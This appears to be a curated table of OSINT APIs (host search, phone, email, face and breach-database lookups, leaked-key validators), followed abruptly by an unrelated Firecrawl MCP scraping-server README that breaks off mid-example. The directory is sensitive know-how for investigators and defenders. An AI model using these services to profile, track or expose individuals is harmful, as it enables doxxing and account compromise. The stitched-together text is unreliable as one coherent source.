Thank you for following me! https://cybdetective.com
Name | Link | Description | Price |
---|---|---|---|
Shodan | https://developer.shodan.io | Search engine for Internet connected host and devices | from $59/month |
Netlas.io | https://netlas-api.readthedocs.io/en/latest/ | Search engine for Internet connected host and devices. Read more at Netlas CookBook | Partly FREE |
Fofa.so | https://fofa.so/static_pages/api_help | Search engine for Internet connected host and devices | ??? |
Censys.io | https://censys.io/api | Search engine for Internet connected host and devices | Partly FREE |
Hunter.how | https://hunter.how/search-api | Search engine for Internet connected host and devices | Partly FREE |
Fullhunt.io | https://api-docs.fullhunt.io/#introduction | Search engine for Internet connected host and devices | Partly FREE |
IPQuery.io | https://ipquery.io | API for ip information such as ip risk, geolocation data, and asn details | FREE |
Name | Link | Description | Price |
---|---|---|---|
Social Links | https://sociallinks.io/products/sl-api | Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo | PAID. Price per request |
Name | Link | Description | Price |
---|---|---|---|
Numverify | https://numverify.com | Global Phone Number Validation & Lookup JSON API. Supports 232 countries. | 250 requests FREE |
Twillo | https://www.twilio.com/docs/lookup/api | Provides a way to retrieve additional information about a phone number | Free or $0.01 per request (for caller lookup) |
Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | from $0.04 per request |
GetContact | https://github.com/kovinevmv/getcontact | Find info about user by phone number | from $6,89 in months/100 requests |
Veriphone | https://veriphone.io/ | Phone number validation & carrier lookup | 1000 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Global Address | https://rapidapi.com/adminMelissa/api/global-address/ | Easily verify, check or lookup address | FREE |
US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
Google Maps Geocoding API | https://developers.google.com/maps/documentation/geocoding/overview | convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | 0.005 USD per request |
Postcoder | https://postcoder.com/address-lookup | Find adress by postcode | Β£130/5000 requests |
Zipcodebase | https://zipcodebase.com | Lookup postal codes, calculate distances and much more | 5000 requests FREE |
Openweathermap geocoding API | https://openweathermap.org/api/geocoding-api | get geographical coordinates (lat, lon) by using name of the location (city name or area name) | 60 calls/minute 1,000,000 calls/month |
DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate and plan your routes | $1.25-$2 per 1000 elements |
Geotagging API | https://geotagging.ai/ | Predict geolocations by texts | Freemium |
Name | Link | Description | Price |
---|---|---|---|
Approuve.com | https://appruve.co | Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa | Paid |
Onfido.com | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. India | Paid |
Superpass.io | https://surepass.io/passport-id-verification-api/ | Passport, Photo ID and Driver License Verification in India | Paid |
Name | Link | Description | Price |
---|---|---|---|
Open corporates | https://api.opencorporates.com | Companies information | Paid, price upon request |
Linkedin company search API | https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
Mattermark | https://rapidapi.com/raygorodskij/api/Mattermark/ | Get companies and investor information | free 14-day trial, from $49 per month |
Name | Link | Description | Price |
---|---|---|---|
API OSINT DS | https://github.com/davidonzo/apiosintDS | Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 | FREE |
InfoDB API | https://www.ipinfodb.com/api | The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format | FREE |
Domainsdb.info | https://domainsdb.info | Registered Domain Names Search | FREE |
BGPView | https://bgpview.docs.apiary.io/# | allowing consumers to view all sort of analytics data about the current state and structure of the internet | FREE |
DNSCheck | https://www.dnscheck.co/api | monitor the status of both individual DNS records and groups of related DNS records | up to 10 DNS records/FREE |
Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More | FREE |
Host.io | https://host.io/ | Get info about domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
BeVigil OSINT API | https://bevigil.com/osint-api | provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com | 50 credits free/1000 credits/$50 |
Name | Link | Description | Price |
---|---|---|---|
WebScraping.AI | https://webscraping.ai/ | Web Scraping API with built-in proxies and JS rendering | FREE |
ZenRows | https://www.zenrows.com/ | Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies apiKey Yes Unknown | FREE |
Name | Link | Description | Price |
---|---|---|---|
Whois freaks | https://whoisfreaks.com/ | well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet | $19/5000 requests |
WhoisXMLApi | https://whois.whoisxmlapi.com | gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests in month/FREE |
IPtoWhois | https://www.ip2whois.com/developers-api | Get detailed info about a domain | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Ipstack | https://ipstack.com | Detect country, region, city and zip code | FREE |
Ipgeolocation.io | https://ipgeolocation.io | provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30 000 requests per month/FREE |
IPInfoDB | https://ipinfodb.com/api | Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address | FREE |
IP API | https://ip-api.com/ | Free domain/IP geolocation info | FREE |
Name | Link | Description | Price |
---|---|---|---|
Mylnikov API | https://www.mylnikov.org | public API implementation of Wi-Fi Geo-Location database | FREE |
Wigle | https://api.wigle.net/ | get location and other information by SSID | FREE |
Name | Link | Description | Price |
---|---|---|---|
PeetingDB | https://www.peeringdb.com/apidocs/ | Database of networks, and the go-to location for interconnection data | FREE |
PacketTotal | https://packettotal.com/api.html | .pcap files analyze | FREE |
Name | Link | Description | Price |
---|---|---|---|
Binlist.net | https://binlist.net/ | get information about bank by BIN | FREE |
FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | institutions, locations and history events | FREE |
Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation and VAT number validation | FREE |
Alpaca | https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ | Realtime and historical market data on all US equities and ETFs | FREE |
Swiftcodesapi | https://swiftcodesapi.com | Verifying the validity of a bank SWIFT code or IBAN account number | $39 per month/4000 swift lookups |
IBANAPI | https://ibanapi.com | Validate IBAN number and get bank account information from it | Freemium/10$ Starter plan |
Name | Link | Description | Price |
---|---|---|---|
EVA | https://eva.pingutil.com/ | Measuring email deliverability & quality | FREE |
Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability & quality | 100 requests FREE, 5000 requests in month β $14.49 |
EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. | 200 requests FREE, 5000 requets β $40 |
Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone's email address and ensure your emails reach real people | from $49 in month |
Kickbox | https://open.kickbox.com/ | Email verification API | FREE |
FachaAPI | https://api.facha.dev/ | Allows checking if an email domain is a temporary email domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
Genderize.io | https://genderize.io | Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. | 1000 names/day free |
Agify.io | https://agify.io | Predicts the age of a person given their name | 1000 names/day free |
Nataonalize.io | https://nationalize.io | Predicts the nationality of a person given their name | 1000 names/day free |
Name | Link | Description | Price |
---|---|---|---|
HaveIBeenPwned | https://haveibeenpwned.com/API/v3 | allows the list of pwned accounts (email addresses and usernames) | $3.50 per month |
Psdmp.ws | https://psbdmp.ws/api | search in Pastebin | $9.95 per 10000 requests |
LeakPeek | https://psbdmp.ws/api | searc in leaks databases | $9.99 per 4 weeks unlimited access |
BreachDirectory.com | https://breachdirectory.com/api_documentation | search domain in data breaches databases | FREE |
LeekLookup | https://leak-lookup.com/api | search domain, email_address, fullname, ip address, phone, password, username in leaks databases | 10 requests FREE |
BreachDirectory.org | https://rapidapi.com/rohan-patra/api/breachdirectory/pricing | search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) | 50 requests in month/FREE |
Name | Link | Description | Price |
---|---|---|---|
Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
TROVE (Australian Web Archive) API | https://trove.nla.gov.au/about/create-something/using-api | Retrieve information about TROVE capture data | FREE |
Archive-it API | https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API | Retrieve information about archive-it capture data | FREE |
UK Web Archive API | https://ukwa-manage.readthedocs.io/en/latest/#api-reference | Retrieve information about UK Web Archive capture data | FREE |
Arquivo.pt API | https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API | Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. | FREE |
Library Of Congress archive API | https://www.loc.gov/apis/ | Provides structured data about Library of Congress collections | FREE |
BotsArchive | https://botsarchive.com/docs.html | JSON formatted details about Telegram Bots available in database | FREE |
Name | Link | Description | Price |
---|---|---|---|
MD5 Decrypt | https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | 1.99 EURO/day |
Name | Link | Description | Price |
---|---|---|---|
BTC.com | https://btc.com/btc/adapter?type=api-doc | get information about addresses and transanctions | FREE |
Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) | $0.33 - $1 per 1000 calls |
Bitcointabyse | https://www.bitcoinabuse.com/api-docs | Lookup bitcoin addresses that have been linked to criminal activity | FREE |
Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on the Bitcoin Address | FREE |
Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
apilayer coinlayer | https://coinlayer.com | Real-time Crypto Currency Exchange Rates | FREE |
BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historic crypto data from more than 200+ exchanges | FREE |
WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrencies Prices | FREE |
WalletLabels | https://www.walletlabels.xyz/docs | Labels for 7,5 million Ethereum wallets | FREE |
Name | Link | Description | Price |
---|---|---|---|
VirusTotal | https://developers.virustotal.com/reference | files and urls analyze | Public API is FREE |
AbuseLPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE |
AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
URLScan.io | https://urlscan.io/about-api/ | Scan and Analyse URLs | FREE |
Web of Thrust | https://support.mywot.com/hc/en-us/sections/360004477734-API- | IP/domain/URL reputation | FREE |
Threat Jammer | https://threatjammer.com/docs/introduction-threat-jammer-user-api | IP/domain/URL reputation | ??? |
Name | Link | Description | Price |
---|---|---|---|
Search4faces | https://search4faces.com/api.html | Detect and locate human faces within an image, and returns high-precision face bounding boxes. FaceβΊβΊ also allows you to store metadata of each detected face for future use. | $21 per 1000 requests |
## Face Detection
Name | Link | Description | Price |
---|---|---|---|
Face++ | https://www.faceplusplus.com/face-detection/ | Search for people in social networks by facial image | from 0.03 per call |
BetaFace | https://www.betafaceapi.com/wpa/ | Can scan uploaded image files or image URLs, find faces and analyze them. API also provides verification (faces comparison) and identification (faces search) services, as well able to maintain multiple user-defined recognition databases (namespaces) | 50 image per day FREE/from 0.15 EUR per request |
## Reverse Image Search
Name | Link | Description | Price |
---|---|---|---|
Google Reverse images search API | https://github.com/SOME-1HING/google-reverse-image-api/ | This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. | FREE (UNOFFICIAL) |
TinEyeAPI | https://services.tineye.com/TinEyeAPI | Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image | Start from $200/5000 searches |
Bing Images Search API | https://www.microsoft.com/en-us/bing/apis/bing-image-search-api | With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. | 1,000 requests free per month FREE |
MRISA | https://github.com/vivithemage/mrisa | MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results | FREE? (no official) |
PicImageSearch | https://github.com/kitUIN/PicImageSearch | Aggregator for different Reverse Image Search API | FREE? (no official) |
## AI Geolocation
Name | Link | Description | Price |
---|---|---|---|
Geospy | https://api.geospy.ai/ | Detecting estimation location of uploaded photo | Access by request |
Picarta | https://picarta.ai/api | Detecting estimation location of uploaded photo | 100 request/day FREE |
Name | Link | Description | Price |
---|---|---|---|
Twitch | https://dev.twitch.tv/docs/v5/reference | ||
YouTube Data API | https://developers.google.com/youtube/v3 | ||
https://www.reddit.com/dev/api/ | |||
Vkontakte | https://vk.com/dev/methods | ||
Twitter API | https://developer.twitter.com/en | ||
Linkedin API | https://docs.microsoft.com/en-us/linkedin/ | ||
All Facebook and Instagram API | https://developers.facebook.com/docs/ | ||
Whatsapp Business API | https://www.whatsapp.com/business/api | ||
Telegram and Telegram Bot API | https://core.telegram.org | ||
Weibo API | https://open.weibo.com/wiki/APIζζ‘£/en | ||
https://dev.xing.com/partners/job_integration/api_docs | |||
Viber | https://developers.viber.com/docs/api/rest-bot-api/ | ||
Discord | https://discord.com/developers/docs | ||
Odnoklassniki | https://ok.ru/apiok | ||
Blogger | https://developers.google.com/blogger/ | The Blogger APIs allows client applications to view and update Blogger content | FREE |
Disqus | https://disqus.com/api/docs/auth/ | Communicate with Disqus data | FREE |
Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) | FREE |
HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, Social Plugins and more | FREE |
Line | https://developers.line.biz/ | Line Login, Share on Line, Social Plugins and more | FREE |
TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and user's video posts on TikTok platform | FREE |
Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr Data | FREE |
!WARNING Use with caution! Accounts may be blocked permanently for using unofficial APIs.
Name | Link | Description | Price |
---|---|---|---|
TikTok | https://github.com/davidteather/TikTok-Api | The Unofficial TikTok API Wrapper In Python | FREE |
Google Trends | https://github.com/suryasev/unofficial-google-trends-api | Unofficial Google Trends API | FREE |
YouTube Music | https://github.com/sigma67/ytmusicapi | Unofficial APi for YouTube Music | FREE |
Duolingo | https://github.com/KartikTalwar/Duolingo | Duolingo unofficial API (can gather info about users) | FREE |
Steam. | https://github.com/smiley/steamapi | An unofficial object-oriented Python library for accessing the Steam Web API. | FREE |
https://github.com/ping/instagram_private_api | Instagram Private API | FREE | |
Discord | https://github.com/discordjs/discord.js | JavaScript library for interacting with the Discord API | FREE |
Zhihu | https://github.com/syaning/zhihu-api | FREE Unofficial API for Zhihu | FREE |
Quora | https://github.com/csu/quora-api | Unofficial API for Quora | FREE |
DnsDumbster | https://github.com/PaulSec/API-dnsdumpster.com | (Unofficial) Python API for DnsDumbster | FREE |
PornHub | https://github.com/sskender/pornhub-api | Unofficial API for PornHub in Python | FREE |
Skype | https://github.com/ShyykoSerhiy/skyweb | Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. | FREE |
Google Search | https://github.com/aviaryan/python-gsearch | Google Search unofficial API for Python with no external dependencies | FREE |
Airbnb | https://github.com/nderkach/airbnb-python | Python wrapper around the Airbnb API (unofficial) | FREE |
Medium | https://github.com/enginebai/PyMedium | Unofficial Medium Python Flask API and SDK | FREE |
https://github.com/davidyen1124/Facebot | Powerful unofficial Facebook API | FREE | |
https://github.com/tomquirk/linkedin-api | Unofficial Linkedin API for Python | FREE | |
Y2mate | https://github.com/Simatwa/y2mate-api | Unofficial Y2mate API for Python | FREE |
Livescore | https://github.com/Simatwa/livescore-api | Unofficial Livescore API for Python | FREE |
Name | Link | Description | Price |
---|---|---|---|
Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
Serpstack | https://serpstack.com/ | Google search results to JSON | FREE |
Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bint and many others search results | $50/5000 searches/month |
Bing Web Search API | https://www.microsoft.com/en-us/bing/apis/bing-web-search-api | Search in Bing (+instant answers and location) | 1000 transactions per month FREE |
WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators and many more | from $25 per 1000 queries |
DuckDuckgo Instant Answers API | https://duckduckgo.com/api | An API for some of our Instant Answers, not for full search results. | FREE |
| Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | An API for new privacy search engine | FREE |
Name | Link | Description | Price |
---|---|---|---|
MediaStack | https://mediastack.com/ | News articles search results in JSON | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Darksearch.io | https://darksearch.io/apidoc | search by websites in .onion zone | FREE |
Onion Lookup | https://onion.ail-project.org/ | onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata | FREE |
Name | Link | Description | Price |
---|---|---|---|
Jackett | https://github.com/Jackett/Jackett | API for automate searching in different torrent trackers | FREE |
Torrents API PY | https://github.com/Jackett/Jackett | Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre | FREE |
Torrent Search API | https://github.com/Jackett/Jackett | API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt | 500 queries/day FREE |
Torrent search api | https://github.com/JimmyLaurent/torrent-search-api | Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) | FREE |
Torrentinim | https://github.com/sergiotapia/torrentinim | Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. | FREE |
Name | Link | Description | Price |
---|---|---|---|
National Vulnerability Database CVE Search API | https://nvd.nist.gov/developers/vulnerabilities | Get basic information about CVE and CVE history | FREE |
OpenCVE API | https://docs.opencve.io/api/cve/ | Get basic information about CVE | FREE |
CVEDetails API | https://www.cvedetails.com/documentation/apis | Get basic information about CVE | partly FREE (?) |
CVESearch API | https://docs.cvesearch.com/ | Get basic information about CVE | by request |
KEVin API | https://kevin.gtfkd.com/ | API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data | FREE |
Vulners.com API | https://vulners.com | Get basic information about CVE | FREE for personal use |
Name | Link | Description | Price |
---|---|---|---|
Aviation Stack | https://aviationstack.com | get information about flights, aircrafts and airlines | FREE |
OpenSky Network | https://opensky-network.org/apidoc/index.html | Free real-time ADS-B aviation data | FREE |
AviationAPI | https://docs.aviationapi.com/ | FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather | FREE |
FachaAPI | https://api.facha.dev | Aircraft details and live positioning API | FREE |
Name | Link | Description | Price |
---|---|---|---|
Windy Webcams API | https://api.windy.com/webcams/docs | Get a list of available webcams for a country, city or geographical coordinates | FREE with limits or 9990 euro without limits |
## Regex
Name | Link | Description | Price |
---|---|---|---|
Autoregex | https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a | Convert English phrase to regular expression | from $3.49/month |
Name | Link |
---|---|
API Guessr (detect API by auth key or by token) | https://api-guesser.netlify.app/ |
REQBIN Online REST & SOAP API Testing Tool | https://reqbin.com |
ExtendClass Online REST Client | https://extendsclass.com/rest-client-online.html |
Codebeatify.org Online API Test | https://codebeautify.org/api-test |
SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Talend API Tester Google Chrome Extension | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Michael Bazzel APIs search tools | https://inteltechniques.com/tools/API.html |
Name | Link |
---|---|
Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON | https://curlconverter.com |
Curl-to-PHP. Instantly convert curl commands to PHP code | https://incarnate.github.io/curl-to-php/ |
Curl to PHP online (Codebeatify) | https://codebeautify.org/curl-to-php-online |
Curl to JavaScript fetch | https://kigiri.github.io/fetch/ |
Curl to JavaScript fetch (Scrapingbee) | https://www.scrapingbee.com/curl-converter/javascript-fetch/ |
Curl to C# converter | https://curl.olsh.me |
Name | Link |
---|---|
Sheety. Create API frome GOOGLE SHEET | https://sheety.co/ |
Postman. Platform for creating your own API | https://www.postman.com |
Reetoo. Rest API Generator | https://retool.com/api-generator/ |
Beeceptor. Rest API mocking and intercepting in seconds (no coding). | https://beeceptor.com |
Name | Link |
---|---|
RapidAPI. Market your API for millions of developers | https://rapidapi.com/solution/api-provider/ |
Apilayer. API Marketplace | https://apilayer.com |
Name | Link | Description |
---|---|---|
Keyhacks | https://github.com/streaak/keyhacks | Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. |
All about APIKey | https://github.com/daffainfo/all-about-apikey | Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example) |
API Guessr | https://api-guesser.netlify.app/ | Enter API Key and and find out which service they belong to |
Name | Link | Description |
---|---|---|
APIDOG ApiHub | https://apidog.com/apihub/ | |
Rapid APIs collection | https://rapidapi.com/collections | |
API Ninjas | https://api-ninjas.com/api | |
APIs Guru | https://apis.guru/ | |
APIs List | https://apislist.com/ | |
API Context Directory | https://apicontext.com/api-directory/ | |
Any API | https://any-api.com/ | |
Public APIs Github repo | https://github.com/public-apis/public-apis |
If you don't know how to work with the REST API, I recommend you check out the Netlas API guide I wrote for Netlas.io.
There it is very brief and accessible to write how to automate requests in different programming languages (focus on Python and Bash) and process the resulting JSON data.
Thank you for following me! https://cybdetective.com
A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
Β
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor π₯οΈ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide
To configure Firecrawl MCP in Cursor v0.45.6
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6
json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }
If you are using Windows and are running into issues, try
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key
with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
FIRECRAWL_API_KEY
: Your Firecrawl API keyFIRECRAWL_API_URL
FIRECRAWL_API_URL
(Optional): Custom API endpoint for self-hosted instanceshttps://firecrawl.your-domain.com
FIRECRAWL_RETRY_MAX_ATTEMPTS
: Maximum number of retry attempts (default: 3)FIRECRAWL_RETRY_INITIAL_DELAY
: Initial delay in milliseconds before first retry (default: 1000)FIRECRAWL_RETRY_MAX_DELAY
: Maximum delay in milliseconds between retries (default: 10000)FIRECRAWL_RETRY_BACKOFF_FACTOR
: Exponential backoff multiplier (default: 2)FIRECRAWL_CREDIT_WARNING_THRESHOLD
: Credit usage warning threshold (default: 1000)FIRECRAWL_CREDIT_CRITICAL_THRESHOLD
: Credit usage critical threshold (default: 100)For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
Add this to your claude_desktop_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:
Retry Behavior
Automatically retries failed requests due to rate limits
Example: With default settings, retries will be attempted at:
Credit Usage Monitoring
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape
)Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
firecrawl_batch_scrape
)Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status
)Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search
)Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl
)Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract
)Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
urls
: Array of URLs to extract information fromprompt
: Custom prompt for the LLM extractionsystemPrompt
: System prompt to guide the LLMschema
: JSON schema for structured data extractionallowExternalLinks
: Allow extraction from external linksenableWebSearch
: Enable web search for additional contextincludeSubdomains
: Include subdomains in extractionWhen using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.
Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
